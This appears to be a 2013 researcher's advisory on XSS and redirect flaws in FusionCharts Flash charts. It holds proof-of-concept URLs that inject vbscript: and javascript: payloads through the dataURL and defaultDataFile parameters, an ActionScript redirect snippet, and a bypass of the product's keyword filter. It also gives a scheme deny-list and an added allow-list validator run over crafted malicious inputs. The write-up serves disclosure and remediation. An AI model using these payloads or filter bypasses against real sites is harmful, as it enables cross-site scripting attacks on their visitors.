29 March 2013

Below you'll find my findings on a set of FusionCharts vulnerabilities:

A) An attacker can perform an XSS attack by making the chart load an external XML file through the dataURL parameter.

The attacker-controlled XML can then use the link attribute of the chart data (see http://docs.fusioncharts.com/charts/contents/DrillDown/LinkFormat.html) to run a JavaScript payload in the client's browser.

For example (click the graph for the XSS PoC):

http://nirgoldshlager.site50.net/Column3D.swf?dataURL=http://files.nirgoldshlager.com/Data.xml

When the victim clicks the malicious graph, the XSS payload runs in their browser.

B) An attacker can carry out a redirection attack (new tab) in Firefox through the logoURL parameter.

logoURL lets the chart load an external SWF file as its logo. To perform the redirection, the attacker points logoURL at a malicious SWF that calls the send function of a LoadVars object in ActionScript with a "_blank" target, which opens the attacker's URL in a new tab.

req.send call (req is assumed to be a LoadVars object, which is what the three-argument send signature corresponds to in ActionScript 2):

var req:LoadVars = new LoadVars();
// target "_blank" opens the URL in a new window or tab; no data needs to be sent
req.send("http://nirgoldshlager.com", "_blank", "GET");

PoC:

http://nirgoldshlager.site50.net/Column3D.swf?dataURL=http://files.nirgoldshlager.com/Data.xml

 

Solution:

Cross-domain policy file, per Adobe's specification:

http://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/CrossDomain_PolicyFile_Specification.pdf

Caveat: crossdomain.xml is served by the host of the data, so an attacker-controlled host can simply publish a permissive one. The chart SWF itself also has to restrict which hosts dataURL and logoURL may point to.

 

What about the anti-XSS check in the ActionScript?

We're all familiar with the old debugMode=1 bug in FusionCharts, correct?

I have taken an extensive look at FusionCharts' ActionScript and found that it does not have adequate measures in place to block cross-site scripting: the "regex" meant to catch dangerous input is not a regex at all, only a pair of substring checks.

The ActionScript tries to block the dataURL=XXX XSS attack with a weak check that looks only for the keywords javascript and asfunction. Don't let the colon check fool you: it is evaluated only when one of those two keywords is present, so any other scheme goes through untouched.

 

Line 126-128:

function filterXSSChars(strURL)
{
    // the colon / %3A test is reached only if "javascript" or "asfunction" is present
    if (_isOnline == true && ((strURL.toLowerCase().indexOf("javascript") != -1 || strURL.toLowerCase().indexOf("asfunction") != -1) && (strURL.indexOf(":") != -1 || strURL.indexOf("%3A") != -1)))
    {
        // ... (the handling of a matched URL is not shown here)
    }
}

 

An attacker can easily bypass this check in IE by using a vbscript: URL rather than javascript:.

PoC:

 

http://nirgoldshlager.site50.net/MSLinelatest.swf?debugMode=1&dataURL=%27%3E%3Ca%20href=%27vbscript:alert%286%29%27%3E%3Cfont%20size=%22100%22%20%3EClick%20Me%20For%20XSS%3C/font%3E%3C/a%3E%3C%3E

 

It's also possible to bypass it with data:text/html, or with the mocha: and livescript: schemes in older versions of Netscape.

A more complete deny-list would look like:

asfunction|javascript|vbscript|data|mocha|livescript|feed|pcast

(Thanks to @irsdl for the feed tip and to @Milad_Bahari for pcast; feed: and pcast: XSS works on some older versions of Firefox.)

Even this list only catches the schemes someone thought of. The robust fix is an allow-list: decode the value, then accept only http, https or a relative path.

 

As discovered by security researcher Ben Hayak (@benhayak):

A further parameter, defaultDataFile, is exposed to the same XSS. It can be used when the dataURL parameter is filtered or blocked. Its value is read from the FlashVars and unescaped:

Line 125:

var _defaultDataFile = unescape(getFirstValue(rootAttr.defaultdatafile, "Data.xml"));

 

This parameter can be used to execute an XSS attack.

 

PoC:

 

http://nirgoldshlager.site50.net/MSLinelatest.swf?debugMode=1&defaultDataFile=%27%3E%3Ca%20href=%27javascript:alert%286%29%27%3E%3Cfont%20size=%22100%22%20%3EClick%20Me%20For%20XSS%3C/font%3E%3C/a%3E%3C%3E
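As an added example (my own code for this post, not FusionCharts' ActionScript), here is the keyword check from filterXSSChars ported to JavaScript beside a scheme allow-list of the kind recommended above, run over constructed values modelled on the dataURL, defaultDataFile and drill-down link inputs discussed in this post. The hardened check, the sample FlashVars values, the Data.xml and its javascript: link form are all assumptions for illustration, not tested FusionCharts behaviour.

```javascript
// Added example, not FusionCharts code: the keyword check from filterXSSChars
// ported to JavaScript beside a scheme allow-list, both run over constructed
// inputs modelled on the PoCs in this post.

// Port of the check at lines 126-128. The colon test is only reached when
// "javascript" or "asfunction" appears, so every other scheme passes.
function weakFilterBlocks(strURL) {
  const lower = strURL.toLowerCase();
  const hasKeyword = lower.indexOf("javascript") !== -1 ||
                     lower.indexOf("asfunction") !== -1;
  const hasColon = strURL.indexOf(":") !== -1 || strURL.indexOf("%3A") !== -1;
  return hasKeyword && hasColon;
}

// Hardened check (an assumption about what a fix should do, not the vendor's
// patch). Percent-decode until the value stops changing, ignore the control
// and whitespace characters browsers skip inside a scheme, then accept only
// http/https or a relative path that carries no markup characters.
function isSafeUrl(strURL) {
  let decoded = strURL;
  for (let i = 0; i < 3; i++) {                 // "%253A" -> "%3A" -> ":"
    let next;
    try { next = decodeURIComponent(decoded); } catch (e) { return false; }
    if (next === decoded) break;
    decoded = next;
  }
  const probe = decoded.replace(/[\u0000-\u0020\u007f]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(probe);
  if (m) {
    const scheme = m[1].toLowerCase();
    return scheme === "http" || scheme === "https";
  }
  // no scheme: a relative path must not be able to break out of an attribute
  // or element if it is echoed back, as happens with debugMode=1
  return !/[<>"'`]/.test(decoded);
}

// Constructed FlashVars values: the dataURL / defaultDataFile payload shapes
// from the PoC URLs plus the other schemes named in the post.
const FLASHVARS = {
  legit:        "http://example.com/Data.xml",
  relative:     "Data.xml",
  javascript:   "javascript:alert(1)",
  vbscript:     "vbscript:alert(6)",
  dataUri:      "data:text/html,<script>alert(1)</script>",
  mocha:        "mocha:alert(1)",
  encodedColon: "vbscript%3Aalert(6)",
  doubleEnc:    "javascript%253Aalert(1)",
  breakout:     "%27%3E%3Ca%20href=%27vbscript:alert%286%29%27%3EClick%3C/a%3E",
  tabbed:       "java\tscript:alert(1)",
};

// Runs every value through both checks; returns {name: {weakBlocks, hardenedAllows}}.
function compareFilters(values) {
  const out = {};
  for (const [name, v] of Object.entries(values)) {
    out[name] = { weakBlocks: weakFilterBlocks(v), hardenedAllows: isSafeUrl(v) };
  }
  return out;
}

// Constructed Data.xml of the kind an attacker-controlled dataURL could serve.
// The javascript: link form is an assumption about the drill-down link attribute.
const DATA_XML =
  '<chart caption="Sales">\n' +
  '  <set label="Q1" value="10" link="reports/q1.html" />\n' +
  '  <set label="Q2" value="20" link="javascript:alert(document.domain)" />\n' +
  '  <set label="Q3" value="30" link="http://example.com/q3" />\n' +
  '</chart>';

// Returns the link attribute values in the XML that the hardened check rejects.
function unsafeLinksIn(xml) {
  const bad = [];
  const re = /\blink="([^"]*)"/g;
  let m;
  while ((m = re.exec(xml)) !== null) {
    const v = m[1].replace(/&quot;/g, '"').replace(/&lt;/g, "<")
                  .replace(/&gt;/g, ">").replace(/&amp;/g, "&");
    if (!isSafeUrl(v)) bad.push(v);
  }
  return bad;
}

console.log(JSON.stringify(compareFilters(FLASHVARS), null, 2));
console.log("rejected links:", unsafeLinksIn(DATA_XML));
```

The weak check blocks only the javascript: entry; vbscript:, data:, mocha:, the percent-encoded and double-encoded colons, the attribute break-out used in the debugMode=1 PoCs, and a keyword split by a tab all pass it. The allow-list rejects every one of those while still accepting the plain http URL and the relative Data.xml, and the same function applied to the link attributes of the loaded XML catches the javascript: drill-down link.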
